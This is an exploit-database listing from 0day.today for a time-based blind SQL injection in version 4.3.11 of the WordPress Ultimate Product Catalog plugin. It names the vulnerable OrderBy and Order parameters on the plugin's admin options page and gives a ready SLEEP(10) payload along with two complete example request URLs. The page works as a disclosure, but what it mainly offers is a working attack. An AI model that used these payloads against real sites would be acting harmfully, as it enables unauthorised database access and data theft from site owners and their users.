[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Ultimate Product Catalog 4.3.11 Plugin - SQL Injection Vulnerability

Author
41!kh4224rDz
Risk
[
Security Risk High
]
0day-ID
0day-ID-30881
Category
web applications
Date add
13-08-2018
Platform
php
# # # #
# Exploit Title: WordPress Plugin ultimate-product-catalogue (4.3.11) - SQL Injection 
# Dork: N/A
# Date: 13.08.2018
# Vendor Homepage: http://www.etoilewebdesign.com
# Software Link: https://wordpress.org/plugins/ultimate-product-catalogue
# Version: 4.3.11
# Tested on: WiN7_x64/
# 
# # # #
# Exploit Author: 41!kh4224rDz
# Contact:scanweb18@hotmail.com
# # # #
# ------------------------------SQLInjection----------------------------------------
# :
# Parameter : Categories&OrderBy=
# Payload : 1%' AND SLEEP(10)%23
#
# 1)
#
http://localhost/[PATH]/wp-admin/admin.php?page=UPCP-options&DisplayPage=Categories&OrderBy='AND SLEEP(10)%23ASC
#
# 2)
# Parameter : Category_Description&Order
# Payload : 1%' AND SLEEP(10)%23
http://localhost/[PATH]/wp-admin/admin.php?page=UPCP-options&DisplayPage=Products&OrderBy=Item_Description&Order=1%' AND SLEEP(10)%23
# # # #

#  0day.today [2024-11-15]  #